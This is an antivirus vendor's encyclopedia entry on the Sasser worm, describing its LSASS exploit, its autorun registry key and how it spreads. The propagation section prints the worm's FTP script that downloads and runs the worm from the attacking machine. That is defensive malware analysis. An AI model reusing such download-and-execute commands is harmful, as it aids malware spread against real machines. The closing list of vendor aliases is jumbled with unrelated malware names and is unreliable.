Internet threat level: 1
Home→Descriptions→Net-Worm.Win32.Sasser.a
Net-Worm.Win32.Sasser.a
| Detected | May 01 2004 18:41 GMT |
| Released | May 01 2004 18:41 GMT |
| Published | May 11 2004 10:54 GMT |
Technical Details
Sasser is an Internet worm that exploits the MS Windows LSASS vulnerability described in Microsoft Security Bulletin MS04-011.
Microsoft released a patch for this vulnerability on April 13, 2004, while Sasser.a was first detected on April 30, 2004.
Sasser operates in a very similar manner to Lovesan, except that Lovesan exploited a vulnerability in the PRC DCOM service, not the LSASS service.
Sasser affects computers running Windows 2000, Windows XP, Windows Server 2003. Sasser functions on all other versions of Windows but is unable to infect them by attacking via the vulnerability.
Sasser is written in C/C++, using the Visual C complier. The worm is about 15 KL and is packed by PECompact2.
Signs of Infection
- the file 'avserve.exe' in the Windows directory.
- An error message about the LSASS service failing which usually also causes the system to reboot.
Propagation
After launching, Sasser copies itself into the Windows root directory under the name avserve.exe and registers this file in the system registry autorun key:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "avserve.exe" = "%WINDIR%\avserve.exe"
Sasser creates a unique identifier 'Jobaka31' in the RAM to locate copies of itself in case of future attempts of infection.
Sasser launches FTP server on TCP port 5554 and then launches 128 propagation routines. During this process, the worm attempts to initiate the AbortSystemShutdown process in order to forbid system reboot.
Sasser initiates an IP-address scan in order to identify victim addresses and sends a request to TCP port 445. If any machines respond, Sasser exploits the LSASS vulnerability to launch a 'cmd.exe' command shell on TCP port 9996. Finally Sasser, commands the infected machine to download and launch the main worm component under the name "N_up.exe", where "N" is a random number:
echo off echo open [attacking machine address] 5554>>cmd.ftp echo anonymous>>cmd.ftp echo user echo bin>>cmd.ftp echo get [random number]_up.exe>>cmd.ftp echo bye>>cmd.ftp echo on ftp -s:cmd.ftp [random number]_up.exe echo off del cmd.ftp echo on
As a result, one machine may be attacked more than once and contain multiple copies of the worm with sample names such as:
23101_up.exe 5409_up.exe
and so forth.
Other
After infection the victim machine generates an error message about a LSASS service failing, whereupon it may attempt to reboot.
Sasser creates the file 'win.log' in the C drive root directory where the worm records the IP-addresses of all attacked machines.
Net-Worms propagate via computer networks. The distinguishing feature of this type of worm is that it does not require user action in order to spread.
This type of worm usually searches for critical vulnerabilities in software running on networked computers. In order to infect the computers on the network, the worm sends a specially crafted network packet (called an exploit) and as a result the worm code (or part of the worm code) penetrates the victim computer and activates. Sometimes the network packet only contains the part of the worm code which will download and run a file containing the main worm module. Some network worms use several exploits simultaneously to spread, thus increasing the speed at which they find victims.
Net-Worm.
- Worm.
Win32. Sasser. a (Kaspersky Lab) - Virus:
W32/Virut. gen. a (McAfee) - W32/Virut-W (Sophos)
- W32.
Virut-54 (ClamAV) - W32/Sasser.
C. worm (Panda) - W32/Sasser.
B (FPROT) - Virus:
Win32/Virut. AC (MS(OneCare)) - Win32.
Virut. 30 (DrWeb) - Win32/Virut.
AV virus (Nod32) - Win32.
Worm. Sasser. B (BitDef7) - I-Worm.
Sasser. B (VirusBuster) - Email-Worm.
Win32. Plexus (Ikarus) - I-Worm/Sasser.
H (AVG) - W32/Virut.
AX (AVIRA) - W32.
Sasser. C. Worm (NAV) - Sasser.
B (Norman) - Win32.
Virut. an (Rising) - Net-Worm.
Win32. Sasser. a [AVP] (FSecure) - PE_VIRUT.
AV (TrendMicro) - I-Worm.
Sasser. B (VirusBusterBeta)
© 1997-2010 Kaspersky Lab ZAO. All Rights Reserved.
Industry-leading Antivirus Software.
Registered trademarks and service marks are the property of their respective owners.